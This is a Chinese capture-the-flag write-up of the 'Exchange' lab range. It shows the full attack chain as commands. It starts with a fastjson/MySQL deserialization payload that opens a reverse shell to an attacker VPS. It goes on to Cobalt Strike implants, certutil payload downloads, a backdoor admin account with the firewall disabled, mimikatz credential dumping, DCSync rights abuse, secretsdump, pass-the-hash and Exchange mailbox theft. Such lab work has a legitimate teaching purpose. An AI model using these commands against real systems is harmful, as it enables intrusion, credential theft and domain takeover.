首页 > 其他分享 >春秋云镜 Exchange WP

春秋云镜 Exchange WP

时间:2023-11-10 15:26:45浏览次数:44  
标签:Exchange com 云镜 len https WP open 172.22 3.9

春秋云镜 Exchange WP

fscan扫描

(icmp) Target 39.100.160.90   is alive
[*] Icmp alive hosts len is: 1
39.100.160.90:80 open
39.100.160.90:8000 open
39.100.160.90:22 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://39.100.160.90      code:200 len:19813  title:lumia
[*] WebTitle: http://39.100.160.90:8000 code:302 len:0      title:None 跳转url: http://39.100.160.90:8000/login.html
[*] WebTitle: http://39.100.160.90:8000/login.html code:200 len:5662   title:Lumia ERP
已完成 3/3
[*] 扫描结束,耗时: 48.078568s


弱口令admin 123456

然后上网搜索nday
https://cn-sec.com/archives/387212.html
经过测试,感觉应该没有未授权漏洞
所以随便在一个地方点击查询,抓包

手动复现漏洞

dnslog='xxx'
test = '{"@type":"java.net.Inet4Address","val":"'+ dnslog +'"}'
test = test.encode('utf-8')
test = ''.join('%{:02X}'.format(x) for x in test)
print(test)



反弹shell:
fastjson和mysql
https://github.com/frohoff/ysoserial
https://github.com/fnmsd/MySQL_Fake_Server
把ysoserial放在MySQL_Fake_Server目录下
稍微改一下config.json

    {
        "config":{
            "ysoserialPath":"ysoserial-all.jar",
            "javaBinPath":"java",
            "fileOutputDir":"./fileOutput/",
            "displayFileContentOnScreen":true,
            "saveToFile":true
        },
        "fileread":{
            "win_ini":"c:\\windows\\win.ini",
            "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
            "win":"c:\\windows\\",
            "linux_passwd":"/etc/passwd",
            "linux_hosts":"/etc/hosts",
            "index_php":"index.php",
            "ssrf":"https://www.baidu.com/",
            "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
        },
        "yso":{
            "Jdk7u21":["Jdk7u21","calc"],
            "CommonsCollections6":["CommonCollections6","bash -c {echo,xxx}|{base64,-d}|{bash,-i}"]
        }
    }

url编码

{ "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "vps-ip", "portToConnectTo": 3306, "info": { "user": "yso_CommonsCollections6_bash -c {echo,xxx}|{base64,-d}|{bash,-i}", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" } }

发送payload

远程下载cs的linux木马,fscan,frp
上线cs

找到第一个flag

查看内网网段

fscan扫描

(icmp) Target 172.22.3.12     is alive
(icmp) Target 172.22.3.2      is alive
(icmp) Target 172.22.3.9      is alive
(icmp) Target 172.22.3.26     is alive
[*] Icmp alive hosts len is: 4
172.22.3.9:8172 open
172.22.3.9:81 open
172.22.3.12:22 open
172.22.3.26:445 open
172.22.3.9:445 open
172.22.3.2:445 open
172.22.3.9:443 open
172.22.3.26:139 open
172.22.3.9:139 open
172.22.3.26:135 open
172.22.3.9:135 open
172.22.3.2:135 open
172.22.3.12:8000 open
172.22.3.2:88 open
172.22.3.2:139 open
172.22.3.9:808 open
172.22.3.9:80 open
172.22.3.12:80 open
[*] alive ports len is: 18
start vulscan
[*] NetInfo:
[*]172.22.3.26
   [->]XIAORANG-PC
   [->]172.22.3.26
[*] NetInfo:
[*]172.22.3.9
   [->]XIAORANG-EXC01
   [->]172.22.3.9
[*] NetInfo:
[*]172.22.3.2
   [->]XIAORANG-WIN16
   [->]172.22.3.2
[*] NetBios: 172.22.3.26     XIAORANG\XIAORANG-PC           
[*] NetBios: 172.22.3.9      XIAORANG-EXC01.xiaorang.lab         Windows Server 2016 Datacenter 14393 
[*] NetBios: 172.22.3.2      [+]DC XIAORANG-WIN16.xiaorang.lab      Windows Server 2016 Datacenter 14393 
[*] WebTitle: http://172.22.3.12:8000   code:302 len:0      title:None 跳转url: http://172.22.3.12:8000/login.html
[*] 172.22.3.2  (Windows Server 2016 Datacenter 14393)
[*] WebTitle: http://172.22.3.12        code:200 len:19813  title:lumia
[*] WebTitle: http://172.22.3.12:8000/login.html code:200 len:5662   title:Lumia ERP
[*] WebTitle: http://172.22.3.9:81      code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle: https://172.22.3.9:8172   code:404 len:0      title:None
[*] WebTitle: http://172.22.3.9         code:403 len:0      title:None
[*] WebTitle: https://172.22.3.9        code:302 len:0      title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle: https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237  title:Outlook

frp内网漫游
内网成员

172.22.3.12 入口
172.22.3.2 DC
172.22.3.9 另一台web
172.22.3.26 成员 

访问https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0

找到篇利用文章
https://saucer-man.com/information_security/748.html#cl-9

proxychains -q python3 exchange.py -u 172.22.3.9 -user administrator -suffix @xiaorang.lab


恰好发现入口服务器上有python

在当前目录起一个python服务

python3 -m http.server 9999


生成cs的中转木马

然后172.22.3.9远程下载172.22.3.12上的中转木马

bitsadmin /transfer n http://172.22.3.12:9999/listener.exe c:\windows\system32\inetsrv\listener.exe(失败)
certutil -urlcache -split -f http://172.22.3.12:9999/listener.exe listener.exe


执行后也失败了,应该是目标机器不出网
添加后门用户,远程登录

reg add 'HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall set allprofiles state off
net user hacker Admin@123 /add
net localgroup administrators hacker /add


找到flag

上传mimikatz

mimikatz.exe "log" "privilege::debug"   "sekurlsa::logonpasswords  /all" exit

然后quser查看当前登录的用户

之后是使用sharphound收集信息

powershell -exec bypass -command "Import-Module ./SharpHound.ps1; Invoke-BloodHound -c all"

但报错了,参考别人的wp发现下一步攻击思路:
EXC01机器账户默认对域内成员具有writeDacl权限,这个权限允许身份修改指定对象ACL,所以可以给Zhangtong修改个DCSync,然后就可以抓域控哈希了。
https://github.com/ThePorgs/impacket

proxychains -q python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :597478048ac053ca7862244d390166b2 -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2


或者
https://github.com/CravateRouge/bloodyAD

apt install libkrb5-dev -y
pip3 install -r requirements.txt -i http://mirrors.aliyun.com/pypi/simple --trusted-host mirrors.aliyun.com
proxychains -q python3 bloodyAD.py -d xiaorang.lab -u 'XIAORANG-EXC01$' -p :597478048ac053ca7862244d390166b2 --host 172.22.3.2 add dcsync Zhangtong


然后

proxychains -q impacket-secretsdump -hashes :22c7f81993e96ac83ac2f3f1903de8b4 xiaorang.lab/[email protected] -just-dc-ntlm

然后

proxychains -q impacket-wmiexec -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb [email protected] -codec gbk



https://github.com/Jumbo-WJB/PTH_Exchange

proxychains -q python3 pthexchange.py --target https://172.22.3.9 --username Lumia --password 00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296 --action Download

那些0不能省
发现需要用电话号码爆破

zip2john item-0-secret.zip > hash.txt
john --wordlist=phone.txt  hash.txt



参考文章
https://fushuling.com/index.php/2023/10/03/春秋云境·exchange/
https://www.cnblogs.com/backlion/p/17187375.html

标签:Exchange,com,云镜,len,https,WP,open,172.22,3.9
From: https://www.cnblogs.com/thebeastofwar/p/17824156.html

相关文章

  • 推荐WPF的好书(图书)
    英文:1《ProWPFinC#2008》MatthewMacDonald著,Apress出版。这本书,英文版1072页,在我看过的书中,此书绝对是排第一的,不仅全面而且深入,并且其实例应用性非常强。吐血推荐!5星级。2《ProgrammingWPF》ChrisSellsandIanGriffiths著,O'RELLY出版,在前一篇博文也介绍过。目前,我已把这......
  • WPF Video Tutorials
    WPFVideoTutorialsListofWPFvideotutorialsforfree…http://movielibrary.lynda.com/html/modPage.asp?ID=359http://www.bestechvideos.com/category/web-tech/wpf/http://windowsclient.net/learn/videos_wpf.aspx......
  • centos 7 中安装 LWP::UserAgent 模块
     001、编译安装RepeatModeler-2.0.2a时报错如下:(base)[[email protected]]#perlconfigure##编译安装,提示缺乏LWP::UserAgentmoduleThefollowingperlmodulesrequiredbyRepeatModeleraremissingfromyoursystem.Pleaseinstallthesefir......
  • 02 WPF 常用控件
    02WPF常用控件基本控件使用Border控件在另一个元素四周绘制边框和/或背景(嵌套其他元素)<BorderWidth="300"Height="100"Background="Red"BorderBrush="Black"BorderThickness="10"CornerRadius="10,20,......
  • WPF控件,按钮名称分行显示的方法
    1、利用XML规则下的特殊字符和空格下面的字符在[XML]中被定义为空白(whitespace)字符: 空格【】Tab 【】回车 【】换行【】这里,为了实现分行,我们选择最后一个换行。比如:<ButtonWidth="100" Height="50" Click="Button_Click_2" Content="第一行&#x000A......
  • WPF VirtualizingPanel 实现UI虚拟化
    当需要优化ItemsControl的性能时,使用VirtualizingPanel。优点是不会为面板的所有子元素创建相应的UI元素,而只会为显示的那些子元素创建相应的UI元素。尤其是元素多的情况下,这会导致性能上的巨大差异。VirtualizingPanel类中实现以下几项依赖属性。CacheLength/CacheLeng......
  • WPF使用矢量图标
    阿里巴巴矢量图库https://www.iconfont.cn/选择要使用的图标加入购物车,添加至项目。资源管理➡我的项目,Unciode-下载至本地在IDE中复制xxxx.ttf文件复制到项目Fonts文件夹中,xxx.html中查看图标编号(检查文件属性是否为资源) FontFamily="./Fonts/xxxx.ttf#xxxx"<TextBlo......
  • CTFshow Reverse BJDCTF2020 JustRE wp
    INT_PTR__stdcallDialogFunc(HWNDhWnd,UINTa2,WPARAMa3,LPARAMa4){CHARString[100];//[esp+0h][ebp-64h]BYREFif(a2!=272){if(a2!=273)return0;if((_WORD)a3!=1&&(_WORD)a3!=2){sprintf(......
  • WPF应用添加快捷键
    一些快捷键的操作,可以极大地方便了应用的操作。目前我经常用的一些快捷键:1、ESC:关闭窗体2、Ctrl+N:新建3、F2:编辑3、Delete:删除4、F5:刷新5、Ctrl+S:保存有些快捷键,适合针对窗体直接设置。<Window.InputBindings><KeyBindingCommand="{BindingAddCommand}"Gesture="......
  • WPF 使用 CommunityToolkit.Mvvm
    参考文档: IntroductiontotheMVVMToolkit-CommunityToolkitsfor.NET|MicrosoftLearn它是一个现代化,快速和模块化的MVVM库,对应用程序的结构或编译规范没有严格的限制。NuGet安装包搜索:CommunityToolkit.Mvvm导入usingCommunityToolkit.Mvvm;使用ObservableObjectpubli......